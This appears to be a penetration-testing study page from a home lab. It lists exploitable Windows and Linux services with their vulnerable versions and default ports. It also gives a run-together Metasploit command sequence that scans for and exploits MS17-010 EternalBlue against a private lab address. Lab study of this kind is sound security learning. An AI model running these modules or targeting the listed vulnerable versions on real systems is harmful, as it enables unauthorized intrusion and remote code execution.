Exploitation
Windows Exploitation
HFS (HTTP File Server)
A HFS (HTTP File Server) is a file and documents sharing web server.
Rejetto HFS - free open source HTTP file server
SMB - MS17-010 EternalBlue
EternalBlue takes advantage of a Windows SMBv1 protocol vulnerability
Patch was released in March 2017
🔬 Check the Lab 2 - Eternal Blue here
Some MSF useful commands from my Home Lab (
Kali VM + Win 2008_R2 Server)
service postgresql start && msfconsole -qdb_statussetg RHOSTS 192.168.31.131setg RHOST 192.168.31.131workspace -a EternalBluedb_nmap -sS -sV -O 192.168.31.131search type:auxiliary EternalBlueuse auxiliary/scanner/smb/smb_ms17_010optionsrunsearch type:exploit EternalBlueuse exploit/windows/smb/ms17_010_eternalblueoptionsrun
WinRM
Identify WinRM users with MSF and exploit WinRM by obtaining access credentials.
Default WinRM HTTP port is
5985and HTTPS5986
Apache Tomcat
Apache Tomcat is a free open source Java servlet web server, build to host dynamic websites and web apps developed in Java.
Tomcat default TCP port is
8080Apache web server host HTML/PHP web apps, instead
Apache Tomcat <
v.8.5.23is vulnerable to a JSP Upload Bypass / RCE
Linux Exploitation
FTP
vsftpd is an Unix FTP server.
vsftpd
v.2.3.4is vulnerable to a command execution vulnerability
SAMBA
Samba is the Linux implementation of SMB.
Samaba
v.3.5.0is vulnerable to a RCE vulnerability
SSH
libssh is a C library that implements the SSHv2 protocol
SSHdefault TCP port is22libssh
v.0.6.0 - 0.8.0is vulnerable to an authentication bypass vulnerability
SMTP
Haraka is an open source high performance SMTP server developed in Node.js
SMTPdefault TCP port is25other TCP ports are
465and587
Haraka prior to
v.2.8.9is vulnerable to command injection
Last updated
